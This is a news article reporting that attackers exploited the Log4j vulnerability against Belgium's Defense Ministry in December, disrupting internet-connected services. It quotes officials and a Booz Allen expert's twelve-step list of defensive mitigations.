Threat actors have exploited a vulnerability in Log4j software to wage a cyber-attack on Belgium’s Defense Ministry.
The attack began on December 16 and was confirmed by Belgium’s Ministry of Defense on Monday.
Speaking to the AFP in Brussels on Tuesday, Belgian military spokesman Commander Olivier Séverin said that the incident had caused damage to services that were connected to the internet, paralyzing part of the ministry’s activities.
He added that five days after the attack began, analysis of the incident was still being carried out and the process of restoring disrupted services remained ongoing.
Séverin did not shed any light on who may have been responsible for the cyber-attack.
A spokesperson for Belgian Defense Minister Ludivine Dedonder said that “the ministry’s teams have been working hard in past days to secure its networks” and that the Belgian government will continue to invest in cybersecurity defenses.
Log4j is a Java-based logging library that tracks system processes. Security teams around the world have been working to secure their systems after multiple vulnerabilities were discovered in Log4j earlier this month.
Mike Saxton, chief technologist at Booz Allen and director of Federal Threat Hunt and Digital Forensics and Incident Response (DFIR) urged organizations to act now to mitigate the Log4j vulnerability.
“Most immediately, organizations must establish and see through a plan that begins with the following: 1) Implementing sensor blocks; 2) Disabling Log4J; 3) Identifying and patching vulnerable versions; 4) Disabling JNDI lookups; 5) Disabling remote codebases; 6) Performing scan with updated vulnerability management templates; 7) Performing searches and analysis of all security logs for evidence of enumeration or compromise; 8) Consolidating, communicating, and disseminating updated threat intel associated with Log4j; 9) Tracking all remediation and mitigation efforts and tasks; 10) Continuing to apply up-to-date blocking measures; 11) Monitoring LDAP traffic; and 12) Moving vulnerable systems behind additional firewalls,” said Saxton.
He added: “This list may seem overwhelming, but it should be viewed as a template rather than a checklist that organizations can follow.”
In the long term, Saxton advised organizations to move to a persistent threat hunt model and to work under the assumption that their vulnerable assets will be breached.